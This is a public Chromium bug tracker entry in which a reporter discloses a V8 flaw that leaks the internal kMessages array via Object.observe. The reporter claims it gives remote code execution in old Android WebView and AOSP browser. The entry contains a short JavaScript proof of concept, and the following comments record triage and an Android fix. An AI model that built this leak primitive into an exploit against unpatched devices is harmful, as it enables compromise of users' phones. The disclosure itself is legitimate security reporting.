New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 640073 link

Starred by 0 users

Issue metadata

Status: WontFix
Owner: ----
Closed: Aug 2016
Cc:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: v8 bug lead to RCE in aosp browser or webview on Android 4.4,5.0,5.1

Reported by higonggu...@gmail.com, Aug 23 2016

Issue description


VERSION
this is a v8 bug ,and affect v8 version 3.20 to 4.2. As aosp browser and webview in Android using old blink kernel, so i think it should be fixed.
Chrome Version: [37.0.2062.117] + [stable]
Operating System: Android 4.4,5.0,5.1

REPRODUCTION CASE
kMessages is observable which lead to exception can be controlled to leak InternalArray. 
The code to leak kMessages is as follows:
<script>
var kMessages;
Object.prototype.__defineGetter__("observe_accept_invalid",function(){kMessages=this});
try{Object.observe({},function(){},1)}catch(e){}
delete Object.prototype["observe_accept_invalid"];
alert(kMessages);
</script>

the full exploit in chrome 37 is attached too.
 
pwnwx.html
40.3 KB View Download
Project Member

Comment 1 by ClusterFuzz, Aug 23 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5682565023531008
Project Member

Comment 2 by ClusterFuzz, Aug 23 2016

ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5726907608072192
Status: WontFix (was: Unconfirmed)
Chrome version used is really old, please use latest version. Also, unable to reproduce.
I think you haven't understand this issue, it affect android webview on android 4.4,5.0,and 5.1, and these system is still in maintance.
please involve engineer in android security team, they'll know what i'm talk about. 

Comment 6 by aarya@google.com, Aug 24 2016

Cc: jlarimer@google.com quanto@google.com
+cc folks from Android Security to create tracking bug if needed. I don't think webview is getting updates on older releases.

Comment 7 by quanto@google.com, Aug 31 2016

AndroidID-31217937 logged to review this for Android.

Comment 8 by quanto@google.com, Sep 26 2016

Note, Android is issuing a fix for this.
Project Member

Comment 9 by sheriffbot@chromium.org, Nov 30 2016

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment